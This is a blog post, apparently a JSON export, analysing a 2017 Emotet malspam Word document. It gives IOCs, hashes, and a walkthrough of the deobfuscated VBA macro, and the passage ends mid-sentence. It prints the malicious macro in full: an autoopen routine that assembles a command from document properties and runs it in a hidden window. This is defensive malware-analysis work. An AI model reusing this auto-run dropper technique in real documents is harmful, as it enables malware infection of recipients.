{"id":938,"date":"2017-08-28T18:09:51","date_gmt":"2017-08-28T17:09:51","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=938"},"modified":"2017-08-28T18:13:33","modified_gmt":"2017-08-28T17:13:33","slug":"2017-08-28-malspam-leads-to-emotet-malware","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=938","title":{"rendered":"2017-08-28 Malspam Leads To Emotet Malware"},"content":{"rendered":"<p>For today&#8217;s post, I am walking through an Emotet malspam that we received this past Friday. The email contained a simple link that led to a macro-enabled Word document. Googling around, I see that <a href=\"http:\/\/twitter.com\/dvk01uk\" target=\"_blank\">@dvk01uk<\/a> came across the same URLs 5 days ago. You can read that post <a href=\"http:\/\/myonlinesecurity.co.uk\/quick-and-dirty-analysis-for-the-new-emotet-banking-trojans-coming-in-word-docs\/\" target=\"_blank\">here<\/a>. Running the maldoc in my test VM showed that the initial link was still working and downloaded an executable. When running that executable on my test VM, I saw a couple of POST requests going to dead sites. First I will walk through the script that I deobfuscated, and then the traffic coming from the maldoc. <\/p>\n<p>For more information about Emotet, see <a href=\"http:\/\/www.scmagazine.com\/emotet-banking-trojan-debuts-in-us\/article\/654652\/\" target=\"_blank\">this article<\/a> from SC Magazine. The sample that I discuss here does not seem to be using any of the worm-like propagation techniques described by the team at <a href=\"http:\/\/www.fidelissecurity.com\/threatgeek\/2017\/07\/emotet-takes-wing-spreader\" target=\"_blank\">Fidelis<\/a>.<\/p>\n<p>Note: this was a bank holiday weekend, so this post was written when I could find some free time, and the artifacts gathered may reflect different days\/times. 
\ud83d\ude0e<\/p>\n<p>For all the PCAPs and artifacts from this investigation, please see my repo located <a href=\"http:\/\/github.com\/bloomer1016\/2017-08-25-Emotet-Malspam\" target=\"_blank\">here<\/a>.<\/p>\n<p>IOCs:<br \/>\n=====<br \/>\nwernerbernheim[.]com[.]uy \/ 179[.]27[.]153[.]45 (HTTP GET, \/capacitacion\/bMLTBrcIE\/)<br \/>\nvereb[.]com (\/SOghVS\/, fallback download URL)<br \/>\nhocompro[.]com (\/JlTszW\/, fallback download URL)<br \/>\nokiembociana[.]pl (\/ihCgGO\/, fallback download URL)<br \/>\nqdecisions[.]com (\/Lrwjz\/, fallback download URL)<br \/>\n62[.]39[.]95[.]185 (TCP\/443 POST, plain HTTP, not TLS)<br \/>\n104[.]236[.]252[.]178 (TCP\/8080 POST)<\/p>\n<p>Artifacts:<br \/>\n==========<br \/>\nFile name: Invoice # 9674991 Problem.doc<br \/>\nFile size: 78KB<br \/>\nFile Path: NA<br \/>\nMD5 hash: 34cd3e23fdc582c1f70670e356ae877a<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/#\/file\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc\/community\" target=\"_blank\">http:\/\/virustotal.com\/#\/file\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc\/community<\/a><br \/>\nFirst Submission: 2017-08-23 06:49:36<br \/>\nDetection ratio: 31 \/ 59<br \/>\nMalwr: <a href=\"http:\/\/malwr.com\/analysis\/Mjk5NTJiMWQxMGQ4NGFiYWE1M2YyZTA5MDNkY2MxMmU\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/Mjk5NTJiMWQxMGQ4NGFiYWE1M2YyZTA5MDNkY2MxMmU\/<\/a><br \/>\nHybrid Analysis: <a href=\"http:\/\/www.reverse.it\/sample\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc?environmentId=100\" target=\"_blank\">http:\/\/www.reverse.it\/sample\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc?environmentId=100<\/a><\/p>\n<p>File name: GVhZFRnuDfWvPO.exe<br \/>\nFile size: 84KB<br \/>\nFile Path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nMD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection\" target=\"_blank\">http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection<\/a><br \/>\nFirst Submission: 2017-08-23 21:24:37<br \/>\nDetection ratio: 42 \/ 65<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100\" target=\"_blank\">http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100<\/a><\/p>\n<p>File name: serviceprov.exe<br \/>\nFile size: 84KB<br \/>\nFile Path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows<br \/>\nMD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba (identical to GVhZFRnuDfWvPO.exe; the file is renamed, not rebuilt)<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection\" target=\"_blank\">http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection<\/a><br \/>\nFirst Submission: 2017-08-23 21:24:37<br \/>\nDetection ratio: 42 \/ 65<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100\" target=\"_blank\">http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100<\/a><\/p>\n<p>Walk Through of Script:<br \/>\n=======================<br \/>\nThere are a couple of ways to get at the deobfuscated script. You can use tools like olevba from <a href=\"http:\/\/www.decalage.info\/python\/olevba\" target=\"_blank\">Decalage<\/a> (part of oletools) or <a href=\"http:\/\/blog.didierstevens.com\/programs\/oledump-py\/\" target=\"_blank\">oledump.py<\/a> from Didier Stevens, or my favorite, <a href=\"http:\/\/www.reconstructer.org\/code.html\" target=\"_blank\">OfficeMalScanner<\/a>. 
This walk through will focus on the use of OfficeMalScanner.<\/p>\n<p>Using OfficeMalScanner and the &#8220;info&#8221; option as seen in the image below, it pulled out two files that contained the malicious script (both are the same by the way).<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/OfficeMalScanner.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/OfficeMalScanner.png\" alt=\"\" width=\"1744\" height=\"774\" class=\"aligncenter size-full wp-image-944\" \/><\/a><\/p>\n<p>The following is the original script.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;Module1&quot;\r\n\r\nFunction tBXRpcutKGy()\r\nDim aUyMWUfX()\r\nxhkWNCwR = 7772\r\nReDim aUyMWUfX(7772)\r\naUyMWUfX(5756) = YrpPPTVkfY\r\n aUyMWUfX(3925) = bRtPBPVLz\r\n aUyMWUfX(6618) = 9766\r\n aUyMWUfX(1268) = 3639\r\n For xhkWNCwR = 195 To 4834\r\naUyMWUfX(xhkWNCwR) = xhkWNCwR\r\nNext\r\nEnd Function\r\n \r\nFunction bNZHkXXn()\r\nDim fgwcWMHGyB()\r\ntDkCGBrV = 7093\r\nReDim fgwcWMHGyB(7093)\r\nfgwcWMHGyB(3791) = vPaDUCnZ\r\n fgwcWMHGyB(5504) = SFmtwbbMGNK\r\n fgwcWMHGyB(1812) = cWEcUyXdZNE\r\n fgwcWMHGyB(2665) = PWUYyzCcKws\r\n fgwcWMHGyB(5997) = 3789\r\n fgwcWMHGyB(6096) = 7664\r\n fgwcWMHGyB(6787) = 9833\r\n fgwcWMHGyB(5173) = 2568\r\n fgwcWMHGyB(4031) = 8692\r\n fgwcWMHGyB(1650) = 1540\r\n For tDkCGBrV = 5297 To 3064\r\nfgwcWMHGyB(tDkCGBrV) = tDkCGBrV\r\nNext\r\nEnd Function\r\n \r\nFunction rvKVpBYcu()\r\nDim tfzRDTrcM()\r\nKSkCSdHXAED = 6811\r\nReDim tfzRDTrcM(6811)\r\ntfzRDTrcM(2322) = AtztbeErwa\r\n tfzRDTrcM(4292) = BWmDATcRZ\r\n tfzRDTrcM(6219) = SrkHKEnV\r\n tfzRDTrcM(1691) = GNsYckBaA\r\n tfzRDTrcM(1553) = vdWwxkbEfaE\r\n tfzRDTrcM(6398) = 1299\r\n tfzRDTrcM(4502) = 452\r\n tfzRDTrcM(3842) = 2596\r\n tfzRDTrcM(4721) = 6226\r\n For KSkCSdHXAED = 3469 To 302\r\ntfzRDTrcM(KSkCSdHXAED) 
= KSkCSdHXAED\r\nNext\r\nEnd Function\r\n \r\nFunction uTHgFyyV()\r\nDim hHHLDTgS()\r\nvFEENKuL = 6335\r\nReDim hHHLDTgS(6335)\r\nhHHLDTgS(4533) = AxczdFwCbpa\r\n hHHLDTgS(3443) = DLkLaUttwk\r\n hHHLDTgS(2456) = 1483\r\n hHHLDTgS(889) = 7409\r\n hHHLDTgS(232) = 6145\r\n For vFEENKuL = 6324 To 1071\r\nhHHLDTgS(vFEENKuL) = vFEENKuL\r\nNext\r\nEnd Function\r\n \r\nFunction zyRhMZtEF()\r\nDim fTnNwrrLgAF()\r\nsvuKLgcmw = 4953\r\nReDim fTnNwrrLgAF(4953)\r\nfTnNwrrLgAF(4597) = cBheKFWLWgx\r\n fTnNwrrLgAF(2506) = XXXdnEykpYH\r\n fTnNwrrLgAF(4417) = wgHZUYBb\r\n fTnNwrrLgAF(4436) = VuUMkDrCwv\r\n fTnNwrrLgAF(2230) = 3094\r\n fTnNwrrLgAF(4629) = 8894\r\n fTnNwrrLgAF(1882) = 6101\r\n fTnNwrrLgAF(1650) = 226\r\n fTnNwrrLgAF(1301) = 9588\r\n fTnNwrrLgAF(3423) = 882\r\n For svuKLgcmw = 1730 To 2054\r\nfTnNwrrLgAF(svuKLgcmw) = svuKLgcmw\r\nNext\r\nEnd Function\r\n \r\nFunction kVfxxgeZTcx()\r\nDim cNhmaTXxm()\r\nBmnMsurwx = 8738\r\nReDim cNhmaTXxm(8738)\r\ncNhmaTXxm(2107) = rYpHhaXM\r\n cNhmaTXxm(4239) = ssbeCguByfD\r\n cNhmaTXxm(6984) = TyDznyPyeks\r\n cNhmaTXxm(8257) = 312\r\n cNhmaTXxm(133) = 6779\r\n cNhmaTXxm(3494) = 6258\r\n For BmnMsurwx = 5098 To 1531\r\ncNhmaTXxm(BmnMsurwx) = BmnMsurwx\r\nNext\r\nEnd Function\r\n \r\nFunction zxDDnHtE()\r\nDim xxAHkeRpfGX()\r\nBGLnTuFBWd = 2487\r\nReDim xxAHkeRpfGX(2487)\r\nxxAHkeRpfGX(1258) = FusggnCkM\r\n xxAHkeRpfGX(298) = vPtBDYEkrT\r\n xxAHkeRpfGX(1863) = pgYZFanEX\r\n xxAHkeRpfGX(1971) = TVrCVXdFsrN\r\n xxAHkeRpfGX(332) = tAcsBWNwS\r\n xxAHkeRpfGX(1618) = MzUGSBNYN\r\n xxAHkeRpfGX(789) = 7981\r\n xxAHkeRpfGX(2421) = 7966\r\n xxAHkeRpfGX(138) = 4484\r\n xxAHkeRpfGX(2163) = 9150\r\n xxAHkeRpfGX(1103) = 1880\r\n For BGLnTuFBWd = 438 To 2203\r\nxxAHkeRpfGX(BGLnTuFBWd) = BGLnTuFBWd\r\nNext\r\nEnd Function\r\n \r\nFunction fvUmWakZZYK()\r\nDim TSWvdtKMh()\r\nvwPpbCTn = 7944\r\nReDim TSWvdtKMh(7944)\r\nTSWvdtKMh(7122) = tgNRdsMwt\r\n TSWvdtKMh(3881) = brbXLzLWtH\r\n TSWvdtKMh(2436) = muXZpUfPGaL\r\n TSWvdtKMh(4599) = mCxafFNNa\r\n 
TSWvdtKMh(1118) = 3467\r\n TSWvdtKMh(2552) = 6452\r\n TSWvdtKMh(7686) = 6721\r\n For vwPpbCTn = 7878 To 7420\r\nTSWvdtKMh(vwPpbCTn) = vwPpbCTn\r\nNext\r\nEnd Function\r\n \r\nFunction CgAdLyezp()\r\nDim PfDSCfau()\r\neHBADPnM = 5319\r\nReDim PfDSCfau(5319)\r\nPfDSCfau(4753) = VXsMybXeaA\r\n PfDSCfau(3102) = CNKLPEdUfm\r\n PfDSCfau(1100) = LHcTEumpTTm\r\n PfDSCfau(2463) = xaBCaVhG\r\n PfDSCfau(2793) = 7975\r\n PfDSCfau(4802) = 5773\r\n PfDSCfau(2858) = 6001\r\n PfDSCfau(4300) = 7075\r\n PfDSCfau(4664) = 8911\r\n For eHBADPnM = 2922 To 4875\r\nPfDSCfau(eHBADPnM) = eHBADPnM\r\nNext\r\nEnd Function\r\n \r\nFunction wvFMSCtgSB()\r\nDim UDYkpKHVvc()\r\nmmGwMYbWa = 3559\r\nReDim UDYkpKHVvc(3559)\r\nUDYkpKHVvc(2024) = btKHhNusS\r\n UDYkpKHVvc(2015) = uSRnWNHzvW\r\n UDYkpKHVvc(1996) = LnDZbkwhpEY\r\n UDYkpKHVvc(156) = 6808\r\n UDYkpKHVvc(1741) = 3548\r\n UDYkpKHVvc(1625) = 4118\r\n For mmGwMYbWa = 1128 To 3240\r\nUDYkpKHVvc(mmGwMYbWa) = mmGwMYbWa\r\nNext\r\nEnd Function\r\n \r\nFunction DKWTEVRRMBN()\r\nDim cXszFrzwURz()\r\ncyLYRTKSSdC = 7004\r\nReDim cXszFrzwURz(7004)\r\ncXszFrzwURz(3595) = gtyrxgwS\r\n cXszFrzwURz(2615) = PzfKEZMsBW\r\n cXszFrzwURz(5245) = BNZkwMNR\r\n cXszFrzwURz(4066) = WRscespGr\r\n cXszFrzwURz(3282) = FHMwanSUR\r\n cXszFrzwURz(6547) = 2845\r\n cXszFrzwURz(6240) = 4262\r\n cXszFrzwURz(4314) = 5615\r\n cXszFrzwURz(4342) = 3162\r\n For cyLYRTKSSdC = 3463 To 1101\r\ncXszFrzwURz(cyLYRTKSSdC) = cyLYRTKSSdC\r\nNext\r\nEnd Function\r\n\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function ugCunPaK(sTzHXsUeNU)\r\n\tugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + SNnkzEnw\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\nnXywrxED = &quot;KMEtckFDb&quot;\r\n vXhCxGNDf = &quot;MSryEeLx&quot;\r\n fUpMfRAmTtm = &quot;PDZKSskkZW&quot;\r\n nHLDemZX = &quot;MGRCSwyH&quot;\r\n ZFHHcWys = 
&quot;hbUxpPAm&quot;\r\n RuUFXAPLH = &quot;fLuFrCSY&quot;\r\n DFBrGCMHmkE = &quot;SFbeZuebNsh&quot;\r\n fbtDPfDett = ugCunPaK(&quot;LfRkbnymP&quot;) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + ugCunPaK(&quot;KaGzyXtDkNm&quot;) + ugCunPaK(&quot;NfKBcxXvzGh&quot;) + ugCunPaK(&quot;BDwuRPNPN&quot;)\r\nBNVewnkk = &quot;UrpABZmTnr&quot;\r\n naakDWndM = &quot;yKZfYFAYKfy&quot;\r\n\r\namRFZWXULCs = ugCunPaK(&quot;kgvXgFbt&quot;) + ugCunPaK(&quot;gTmRgTPkG&quot;) + ugCunPaK(&quot;VNbtSPzwZ&quot;) + ugCunPaK(&quot;UmCYHMCwU&quot;) + ugCunPaK(&quot;nmPWNzEc&quot;)\r\nSekyzxBsr = amRFZWXULCs + fbtDPfDett\r\naRSdcDurYRy = &quot;AswGHnGuMza&quot;\r\n dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties(&quot;Comments&quot;) + &quot;&quot;\r\nEnd Function\r\n\r\nPublic Function uMvWKNsFzRd()\r\n\tuMvWKNsFzRd = ugCunPaK(&quot;FEdDZxrN&quot;) + ugCunPaK(&quot;eZumagfGLaB&quot;) + ugCunPaK(&quot;tAxtxcsvzy&quot;) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + KchPUyEn\r\nEnd Function\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(uMvWKNsFzRd + ugCunPaK(&quot;hafbyEHH&quot;) + ugCunPaK(&quot;gsbuMzRpUVs&quot;)).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0\r\nEnd Function\r\n\r\nFunction KWgbkykHZP()\r\nDim RfxRMkmmzZ()\r\napHNVUBpU = 7904\r\nReDim RfxRMkmmzZ(7904)\r\nRfxRMkmmzZ(1286) = xXcDTbkGSW\r\n RfxRMkmmzZ(2064) = EMsevfdYYka\r\n RfxRMkmmzZ(5661) = EMwVBBWVW\r\n RfxRMkmmzZ(1307) = UBXmtnHhnTE\r\n RfxRMkmmzZ(1470) = TXfbKEVeKC\r\n RfxRMkmmzZ(73) = 5450\r\n RfxRMkmmzZ(965) = 9043\r\n RfxRMkmmzZ(229) = 4176\r\n RfxRMkmmzZ(274) = 7658\r\n RfxRMkmmzZ(6802) = 9707\r\n For apHNVUBpU = 6746 To 204\r\nRfxRMkmmzZ(apHNVUBpU) = apHNVUBpU\r\nNext\r\nEnd Function\r\n \r\nFunction 
KRLsRUxSsUC()\r\nDim VxVayeNKuY()\r\nkxcsPUvhp = 9719\r\nReDim VxVayeNKuY(9719)\r\nVxVayeNKuY(5743) = XrTSuwmVh\r\n VxVayeNKuY(2356) = wMrdhDPCbE\r\n VxVayeNKuY(9379) = AGvwbVmarcD\r\n VxVayeNKuY(7940) = 8601\r\n VxVayeNKuY(8579) = 5842\r\n VxVayeNKuY(6218) = 4932\r\n VxVayeNKuY(7419) = 7205\r\n VxVayeNKuY(4097) = 3279\r\n For kxcsPUvhp = 1802 To 5262\r\nVxVayeNKuY(kxcsPUvhp) = kxcsPUvhp\r\nNext\r\nEnd Function\r\n \r\nFunction rspLFEBgVZ()\r\nDim CwwVvdVSvHE()\r\nVSSWyeEK = 4631\r\nReDim CwwVvdVSvHE(4631)\r\nCwwVvdVSvHE(2943) = KnLswFvuSNH\r\n CwwVvdVSvHE(1407) = rXAPeuFkeE\r\n CwwVvdVSvHE(2405) = rZfSvkrkUs\r\n CwwVvdVSvHE(4079) = EYeXZuXzV\r\n CwwVvdVSvHE(808) = 4846\r\n CwwVvdVSvHE(2419) = 6206\r\n For VSSWyeEK = 1315 To 2061\r\nCwwVvdVSvHE(VSSWyeEK) = VSSWyeEK\r\nNext\r\nEnd Function\r\n \r\nFunction KuCFZsbGvfm()\r\nDim RuxuvpKcyh()\r\nFMCSSBse = 2712\r\nReDim RuxuvpKcyh(2712)\r\nRuxuvpKcyh(2072) = uHuEphMy\r\n RuxuvpKcyh(2457) = NgyfMkumRn\r\n RuxuvpKcyh(1760) = xfzSnfCFENf\r\n RuxuvpKcyh(703) = rehrZhEW\r\n RuxuvpKcyh(655) = 8514\r\n RuxuvpKcyh(1385) = 6813\r\n For FMCSSBse = 528 To 1670\r\nRuxuvpKcyh(FMCSSBse) = FMCSSBse\r\nNext\r\nEnd Function\r\n \r\nFunction FFMwgaYM()\r\nDim FBdFYFybY()\r\nfDvNBaxmpMw = 2610\r\nReDim FBdFYFybY(2610)\r\nFBdFYFybY(1373) = PCkLDZhMgc\r\n FBdFYFybY(865) = PehxeTTXude\r\n FBdFYFybY(2007) = 6045\r\n FBdFYFybY(1892) = 1724\r\n FBdFYFybY(96) = 73\r\n FBdFYFybY(2261) = 4950\r\n FBdFYFybY(1865) = 902\r\n For fDvNBaxmpMw = 2409 To 2155\r\nFBdFYFybY(fDvNBaxmpMw) = fDvNBaxmpMw\r\nNext\r\nEnd Function\r\n \r\nFunction emrKSCdBkA()\r\nDim EPrzzbNhTDw()\r\nYCcSTMZV = 4386\r\nReDim EPrzzbNhTDw(4386)\r\nEPrzzbNhTDw(3407) = LYxmCkPnB\r\n EPrzzbNhTDw(4277) = sbHVZmyS\r\n EPrzzbNhTDw(713) = tehkErHMZ\r\n EPrzzbNhTDw(1392) = bKpbxcVgck\r\n EPrzzbNhTDw(3363) = 5378\r\n EPrzzbNhTDw(2300) = 8663\r\n EPrzzbNhTDw(1330) = 764\r\n EPrzzbNhTDw(2300) = 2578\r\n EPrzzbNhTDw(2226) = 1081\r\n EPrzzbNhTDw(2022) = 3830\r\n For YCcSTMZV = 2370 To 
1408\r\nEPrzzbNhTDw(YCcSTMZV) = YCcSTMZV\r\nNext\r\nEnd Function\r\n \r\nFunction UGHFGXMDmY()\r\nDim ptvYBrECdr()\r\nTUcEUXCkuK = 9074\r\nReDim ptvYBrECdr(9074)\r\nptvYBrECdr(8210) = HDKVGwRavL\r\n ptvYBrECdr(8972) = gkALasxL\r\n ptvYBrECdr(8712) = hActVXbu\r\n ptvYBrECdr(6182) = vcMkyVUtD\r\n ptvYBrECdr(1196) = EfhGUuVXbdV\r\n ptvYBrECdr(8154) = hyyxpMgkBT\r\n ptvYBrECdr(6025) = 629\r\n ptvYBrECdr(8192) = 190\r\n ptvYBrECdr(6255) = 8494\r\n For TUcEUXCkuK = 2971 To 8016\r\nptvYBrECdr(TUcEUXCkuK) = TUcEUXCkuK\r\nNext\r\nEnd Function\r\n \r\nFunction vsReyNEk()\r\nDim FGNPxDgR()\r\ndNppxZwPpcb = 4284\r\nReDim FGNPxDgR(4284)\r\nFGNPxDgR(357) = nLSUvpBn\r\n FGNPxDgR(2296) = GmHrPzWe\r\n FGNPxDgR(2084) = yBpTvyTCAX\r\n FGNPxDgR(3032) = kFXYfefe\r\n FGNPxDgR(3090) = 700\r\n FGNPxDgR(2415) = 7683\r\n FGNPxDgR(3723) = 1696\r\n For dNppxZwPpcb = 3075 To 3180\r\nFGNPxDgR(dNppxZwPpcb) = dNppxZwPpcb\r\nNext\r\nEnd Function\r\n \r\nFunction pCHhXMbL()\r\nDim gTbYDYvnCFK()\r\nkSrFLzhF = 6984\r\nReDim gTbYDYvnCFK(6984)\r\ngTbYDYvnCFK(1465) = MfhnzDds\r\n gTbYDYvnCFK(1976) = NWtAppGka\r\n gTbYDYvnCFK(3497) = UuXfxzyYkt\r\n gTbYDYvnCFK(5413) = XPmZdgwFmB\r\n gTbYDYvnCFK(5110) = wxwhYeCeBN\r\n gTbYDYvnCFK(2916) = 4252\r\n gTbYDYvnCFK(5255) = 813\r\n gTbYDYvnCFK(222) = 4637\r\n gTbYDYvnCFK(1608) = 5961\r\n gTbYDYvnCFK(4251) = 6310\r\n gTbYDYvnCFK(2972) = 6903\r\n For kSrFLzhF = 3058 To 574\r\ngTbYDYvnCFK(kSrFLzhF) = kSrFLzhF\r\nNext\r\nEnd Function\r\n \r\nFunction WhBTkeGK()\r\nDim YFxKLWsAfp()\r\nwzGAvURR = 2449\r\nReDim YFxKLWsAfp(2449)\r\nYFxKLWsAfp(1730) = eYhtkWzXts\r\n YFxKLWsAfp(1916) = rWbMKXtXUt\r\n YFxKLWsAfp(503) = 7093\r\n YFxKLWsAfp(1507) = 9360\r\n For wzGAvURR = 1171 To 1136\r\nYFxKLWsAfp(wzGAvURR) = wzGAvURR\r\nNext\r\nEnd Function\r\n \r\nFunction SZcFhkaBYck()\r\nDim xwwxcbkkpw()\r\npSmPsyteH = 692\r\nReDim xwwxcbkkpw(692)\r\nxwwxcbkkpw(339) = KxUbDzCKvv\r\n xwwxcbkkpw(192) = UuLeTrtn\r\n xwwxcbkkpw(199) = WSmyTyrgDpm\r\n xwwxcbkkpw(307) = vrVhCxnBFmu\r\n 
xwwxcbkkpw(511) = yMpmVNbxxZZ\r\n xwwxcbkkpw(270) = 3133\r\n xwwxcbkkpw(489) = 667\r\n xwwxcbkkpw(566) = 887\r\n xwwxcbkkpw(209) = 9747\r\n For pSmPsyteH = 314 To 461\r\nxwwxcbkkpw(pSmPsyteH) = pSmPsyteH\r\nNext\r\nEnd Function<\/pre>\n<p>One of the things that I have learned while trying (emphasis on trying) to deobfuscate scripts and learn this art is that one should first just glance through the script to see if anything stands out (keywords, URLs, paths, etc&#8230;). With this script, the first thing that stood out was the autoopen sub procedure, and then the middle section, since it contained things like &#8220;ActiveDocument.CustomDocumentProperties&#8221; and &#8220;ActiveDocument.BuiltInDocumentProperties(&#8220;Comments&#8221;).&#8221; Doing a quick double-click in Sublime Text on some of the other function names showed that nothing was calling them; they were added to the script to confuse the analyst. The same goes for the long tails of &#8220;+ UrwupfwKDga + ydwzhPhAVZ + &#8230;&#8221; hanging off the string expressions: those names are never assigned anywhere, so in VBA (there is no Option Explicit in this module) they are Empty and add nothing to the concatenation. Two details are worth keeping as you strip things down: the object built by CreateObject is driven through its Run method, and the trailing &#8220;, 0&#8221; on that call is the window style, so whatever gets launched runs with a hidden window. Below is the cleaned up script.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(uMvWKNsFzRd + ugCunPaK(&quot;hafbyEHH&quot;) + ugCunPaK(&quot;gsbuMzRpUVs&quot;)).Run$ dZmAMvagz, 0\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\n\tfbtDPfDett = ugCunPaK(&quot;LfRkbnymP&quot;) + ugCunPaK(&quot;KaGzyXtDkNm&quot;) + ugCunPaK(&quot;NfKBcxXvzGh&quot;) + ugCunPaK(&quot;BDwuRPNPN&quot;)\r\n\tamRFZWXULCs = ugCunPaK(&quot;kgvXgFbt&quot;) + ugCunPaK(&quot;gTmRgTPkG&quot;) + ugCunPaK(&quot;VNbtSPzwZ&quot;) + ugCunPaK(&quot;UmCYHMCwU&quot;) + ugCunPaK(&quot;nmPWNzEc&quot;)\r\n\tSekyzxBsr = amRFZWXULCs + fbtDPfDett\r\n\tdZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties(&quot;Comments&quot;) + &quot;&quot;\r\nEnd Function\r\n\r\nPublic Function ugCunPaK(sTzHXsUeNU)\r\n\tugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) \r\nEnd Function\r\n\r\nPublic Function 
uMvWKNsFzRd()\r\n\tuMvWKNsFzRd = ugCunPaK(&quot;FEdDZxrN&quot;) + ugCunPaK(&quot;eZumagfGLaB&quot;) + ugCunPaK(&quot;tAxtxcsvzy&quot;)\r\nEnd Function<\/pre>\n<p>One thing to note with this script is that it pulls its strings from metadata held in the Word document itself, via &#8220;ActiveDocument.CustomDocumentProperties&#8221; (the user-defined properties) and &#8220;ActiveDocument.BuiltInDocumentProperties(&#8220;Comments&#8221;).&#8221; When you look at the Word document&#8217;s properties in Explorer, there is a &#8220;Custom&#8221; tab with the following data:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Custom-Tab.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Custom-Tab.png\" alt=\"\" width=\"718\" height=\"1006\" class=\"aligncenter size-full wp-image-943\" \/><\/a><\/p>\n<p>When you look at the &#8220;Details&#8221; tab, there is a field called &#8220;Comments&#8221; holding the following long string:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\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<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Comments.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Comments.png\" alt=\"\" width=\"718\" height=\"1008\" class=\"aligncenter size-full wp-image-942\" \/><\/a><\/p>\n<p>Interestingly enough, if you open the Word document and go back to the properties of the file, the &#8220;Custom&#8221; tab and the data within the &#8220;Comments&#8221; field are gone. If you close out the Word doc, they come back. So the script above is using these bits embedded in the Word file itself for something. We will get to that in a moment. 
<\/p>\n<p>So when looking at this macro, like any macro-enabled Word document, I started off with the sub procedure called autoopen, which calls the function &#8216;GnLpEPBGuvx&#8217;. This function creates an object via &#8216;CreateObject&#8217; while also calling the &#8216;uMvWKNsFzRd&#8217;, &#8216;ugCunPaK&#8217;, and &#8216;dZmAMvagz&#8217; functions.<\/p>\n<p>Throughout the script there are calls to the function &#8216;ugCunPaK&#8217;, which takes one parameter (sTzHXsUeNU). All this function does is return the custom document property with that name, i.e. one of the entries on the &#8220;Custom&#8221; tab shown earlier. (The built-in &#8220;Comments&#8221; property is read separately, and only inside &#8216;dZmAMvagz&#8217;.) For example, when working through this line of the script:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nCreateObject(uMvWKNsFzRd + ugCunPaK(&quot;hafbyEHH&quot;) + 